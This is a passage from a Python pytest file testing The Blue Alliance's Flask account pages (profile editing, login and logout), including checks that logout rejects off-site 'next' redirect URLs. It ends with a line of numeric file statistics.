"next": "http://localhost/account/edit"
}
def test_edit(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/edit")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert get_page_title(response.data) == "Edit Profile - The Blue Alliance"
assert context["status"] is None
def test_edit_no_account_id(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={})
assert session.get("account_edit_status") == "account_edit_failure"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_no_account_id_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", follow_redirects=True, data={})
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure"
def test_edit_mismatch_account_id(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={"account_id": "def"})
assert session.get("account_edit_status") == "account_edit_failure"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_mismatch_account_id_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post(
"/account/edit", follow_redirects=True, data={"account_id": "def"}
)
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure"
def test_edit_no_display_name(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={"account_id": "abc"})
assert session.get("account_edit_status") == "account_edit_failure_name"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_no_display_name_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post(
"/account/edit", follow_redirects=True, data={"account_id": "abc"}
)
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure_name"
def test_edit_success(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client, patch.object(
mock, "update_display_name"
) as mock_update_display_name:
response = web_client.post(
"/account/edit", data={"account_id": "abc", "display_name": "Zach"}
)
assert session.get("account_edit_status") is None
mock_update_display_name.assert_called_with("Zach")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account"
def test_logout_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/logout")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/logout"
}
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_logout_unregistered(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "revoke_session_cookie"
) as mock_revoke_session_cookie:
response = web_client.get("/account/logout?next={}".format(quote(next_url)))
assert mock_revoke_session_cookie.called
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/")
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_logout(next_url: str, expected: str, web_client: FlaskClient) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "revoke_session_cookie"
) as mock_revoke_session_cookie:
response = web_client.get("/account/logout?next={}".format(quote(next_url)))
assert mock_revoke_session_cookie.called
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/")
def test_login_logged_in(web_client: FlaskClient) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/login")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account"
def test_login(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
response = web_client.get("/account/login")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
assert template.name == "account_login_required.html"
assert get_page_title(response.data) == "The Blue Alliance - Login Required"
def test_login_no_id_token(web_client: FlaskClient) -> None:
response = web_client.post("/account/login")
assert response.status_code == 400
def test_login_success(web_client: FlaskClient) -> None:
with patch.object(
backend.web.handlers.account, "create_session_cookie"
) as mock_create_session_cookie:
response = web_client.post("/account/login", data={"id_token": "abc"})
mock_create_session_cookie.assert_called_with("abc", ANY)
assert response.status_code == 200
assert response.get_json() == {"status": "success"}
| 34.762887 | 86 | 0.690985 | 2,002 | 16,860 | 5.593906 | 0.05994 | 0.045808 | 0.069113 | 0.076882 | 0.910081 | 0.900527 | 0.874364 | 0.858112 | 0.851326 | 0.847576 | 0 | 0.007812 | 0.180012 | 16,860 | 484 | 87 | 34.834711 | 0.802242 | 0 | 0 | 0.739691 | 0 | 0 | 0.157058 | 0.024318 | 0 | 0 | 0 | 0 | 0.21134 | 1 | 0.06701 | false | 0 | 0.023196 | 0 | 0.092784 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.